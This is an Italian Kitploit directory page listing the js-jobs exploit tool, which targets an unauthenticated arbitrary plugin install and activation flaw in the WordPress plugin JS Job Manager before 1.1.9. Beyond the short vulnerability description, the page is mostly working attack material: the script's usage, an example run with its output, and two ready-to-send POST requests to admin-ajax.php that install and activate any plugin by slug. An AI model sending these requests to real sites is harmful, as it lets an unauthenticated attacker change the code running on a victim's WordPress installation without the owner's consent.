Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Installazione/Attivazione Arbitraria di Plugin senza Autenticazione | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/js-jobs
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Installazione/Attivazione Arbitraria di Plugin senza Autenticazione

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

js-jobs

JS Job Manager < 1.1.9 - Installazione/Attivazione non autenticata di plugin arbitrari

Descrizione

L'azione AJAX jsjobs_ajax del plugin, disponibile sia per utenti autenticati che non autenticati, non dispone di controlli di autorizzazione e CSRF adeguati, in particolare quando si utilizzano installPluginFromAjax e activatePluginFromAjax, il che potrebbe consentire ad attaccanti non autenticati di installare plugin arbitrari dal repository di WordPress e di attivarli (con alcune limitazioni).

Non c'è alcun controllo sulla versione del plugin, quindi verrà installata l'ultima versione del plugin.

Come usare

root@kitploit:~
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Esempio

root@kitploit:~
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Prova di concetto

Per installare un plugin:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Per attivare un plugin (qui c'è una limitazione: il plugin deve avere il file /.php, altrimenti non verrà attivato):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Scarica lo strumento